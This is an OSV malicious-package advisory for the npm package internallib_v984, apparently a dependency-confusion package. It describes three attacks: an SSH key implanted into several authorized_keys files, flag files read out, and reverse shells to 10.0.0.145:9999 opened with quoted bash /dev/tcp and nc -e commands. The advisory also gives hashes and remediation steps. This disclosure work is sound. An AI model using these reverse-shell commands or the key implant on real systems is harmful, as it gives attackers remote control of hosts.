MAL-2026-5695

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/internallib_v984/MAL-2026-5695.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5695
Aliases
  • GHSA-24jp-936m-6fg4
Published
2026-06-12T15:28:17Z
Modified
2026-06-16T00:01:49.606155760Z
Summary
Malicious code in internallib_v984 (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (3c46879ad94169111411f91b210779628bb14a5d16843ec2bec42bf418affdf8)

Package exports a single command() function that, when invoked, performs three coordinated attacks against the host: (1) appends a hardcoded attacker-controlled SSH public key (tr0n@DESKTOP-GVIA2J0) to authorized_keys under /root/.ssh, /home/gitlab-runner/.ssh, and /home/internal/.ssh, granting persistent remote root and CI-runner login; (2) reads /root/root.txt, /home/internal/user.txt, and /home/gitlab-runner/user.txt and writes their contents to stdout; (3) opens a reverse shell to 10.0.0.145:9999 using three redundant methods (bash -i >& /dev/tcp/10.0.0.145/9999 0>&1, nc -e /bin/bash 10.0.0.145 9999, and a Node net.Socket connecting to the same address with spawn('/bin/bash')). The package has no README, no author or repository metadata, and the name internallib_v984 is shaped to win a dependency-confusion resolution against an internal library of that name. There is no legitimate functionality — the entire module is offensive tooling. Any consumer that resolves this package from the public registry and calls its export is fully compromised: persistent SSH access via the implanted key, live interactive C2 via the reverse shell, and exfiltration of CTF-style flag files. The hardcoded RFC1918 destination (10.0.0.145) further indicates the attacker expects to land inside a corporate or lab network where that address is routable.

Source: ghsa-malware (a08961f26609280db99444778ce38929914922ef82a00497645032bf998ecc83)

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Database specific
{
    "malicious-packages-origins": [
        {
            "modified_time": "2026-06-12T15:28:18Z",
            "id": "IN-MAL-2026-005784",
            "source": "amazon-inspector",
            "import_time": "2026-06-12T16:32:16.195323356Z",
            "sha256": "093b5433386d2468e78e9896d1c8566d06f6f3ac6544dc90d4e6fdb9d967c6ed",
            "versions": [
                "1.0.2"
            ]
        },
        {
            "modified_time": "2026-06-12T15:28:20Z",
            "id": "IN-MAL-2026-005786",
            "source": "amazon-inspector",
            "import_time": "2026-06-12T16:32:16.316167869Z",
            "sha256": "3c46879ad94169111411f91b210779628bb14a5d16843ec2bec42bf418affdf8",
            "versions": [
                "1.0.3"
            ]
        },
        {
            "modified_time": "2026-06-12T15:28:18Z",
            "id": "IN-MAL-2026-005783",
            "source": "amazon-inspector",
            "import_time": "2026-06-12T16:32:16.096173613Z",
            "sha256": "5910f34f83567d2d5f48fc2c3966537cc4b313570d77696c743d116fc2b54f05",
            "versions": [
                "1.0.4"
            ]
        },
        {
            "sha256": "7e1e3c1f3e148527111254b20a9cbe8d1a6f5d6abaadc0e45c35ca4b2febc431",
            "id": "IN-MAL-2026-005785",
            "source": "amazon-inspector",
            "import_time": "2026-06-12T16:32:16.257323353Z",
            "modified_time": "2026-06-12T15:28:19Z",
            "versions": [
                "99.0.0"
            ]
        },
        {
            "sha256": "af6c7b94d4d81140d1e4d37ddf38ef298287d7e118ac0849311254c88ebb8916",
            "id": "IN-MAL-2026-005782",
            "source": "amazon-inspector",
            "import_time": "2026-06-12T16:32:16.039312325Z",
            "modified_time": "2026-06-12T15:28:17Z",
            "versions": [
                "1.0.5"
            ]
        },
        {
            "sha256": "b62a6df4be478a792579b9f9741361e56e14fdd0d96f97305bf1fd4a0f076a06",
            "id": "IN-MAL-2026-005787",
            "source": "amazon-inspector",
            "import_time": "2026-06-12T16:32:16.35801051Z",
            "modified_time": "2026-06-12T15:28:21Z",
            "versions": [
                "1.0.1"
            ]
        },
        {
            "ranges": [
                {
                    "events": [
                        {
                            "introduced": "0"
                        }
                    ],
                    "type": "SEMVER"
                }
            ],
            "id": "GHSA-24jp-936m-6fg4",
            "source": "ghsa-malware",
            "import_time": "2026-06-15T23:52:17.781359039Z",
            "modified_time": "2026-06-15T23:37:12Z",
            "sha256": "a08961f26609280db99444778ce38929914922ef82a00497645032bf998ecc83"
        }
    ]
}
References
Credits

Affected packages

npm / internallib_v984

Package

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected

Affected versions

1.*
1.0.1
1.0.2
1.0.3
1.0.4
1.0.5
99.*
99.0.0

Database specific

indicators
{
    "package_integrity": [
        {
            "filename": "internallib_v984-1.0.2.tgz",
            "hashes": {
                "sha1": "e03ded23d8cae7cc88ab9c723cf5cb688f8669fe",
                "sha512_sri": "sha512-nLD1bGfeZmQk66wo48E0yMss13QtTa/lSunlSs5nyzYLJy9cU92yB1yqWeVbG3W29H9aq4JUn9SBQq7e5VnPGw=="
            }
        }
    ],
    "evidence_files": [
        {
            "path": "index.js",
            "tlsh": "bb21001014f2223d1a3311a6eb17b067322388136229db517acc831a0f89e9c57ef3d4",
            "sha256": "c56e66a9a2949458b1ff04c051c756d7da43c20d8d7de439f5902becdb704360"
        },
        {
            "path": "package.json",
            "tlsh": "5fc092b149266d3760d547b41db1890a36a68d3f9406b4485b232a0c80efef368f930c",
            "sha256": "4efa558a27a2536419deb72dd9e9e73c9a541ca938a3b0a6e8e3376604db6ccb"
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/internallib_v984/MAL-2026-5695.json"
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code"
    }
]